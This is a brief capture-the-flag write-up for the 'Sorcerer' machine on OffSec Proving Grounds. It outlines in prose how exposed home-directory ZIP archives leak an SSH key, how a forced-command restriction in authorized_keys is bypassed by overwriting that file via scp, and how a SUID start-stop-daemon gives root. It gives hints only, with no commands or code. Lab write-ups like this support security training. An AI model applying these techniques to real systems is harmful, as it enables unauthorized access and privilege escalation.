Sorcerer Proving Grounds Write-Up

SUMMARY

This write-up covers the Sorcerer machine from Offsec’s Proving Grounds, a Linux machine requiring creative SSH manipulation to bypass an access restriction.

Port 7742 hosted a web service where directory fuzzing revealed a /zipfiles path containing ZIP archives of user home directories. Extracting user max’s archive revealed his SSH private key. Attempting to connect with the key failed because the authorized_keys file contained a directive blocking remote login and running a script instead. That script permitted SCP commands. The public key was modified to remove the restriction, and scp -O was used to overwrite the existing authorized_keys file on the target. SSH as max then succeeded.

Privilege escalation was achieved via a SUID start-stop-daemon binary. The standard GTFOBins technique for this binary was applied to execute a command as root.

---

PATH TO FOLLOW

1. Reconnaissance & /zipfiles Directory Discovery
2. SSH Key Extraction from User ZIP Archive
3. authorized_keys Restriction Analysis & SCP Bypass
4. SSH Access as max
5. SUID start-stop-daemon Discovery
6. GTFOBins Abuse → Shell as Root

Due to OffSec’s policy on content sharing, these write-ups will provide hints only rather than full solutions.I know, boring stuff.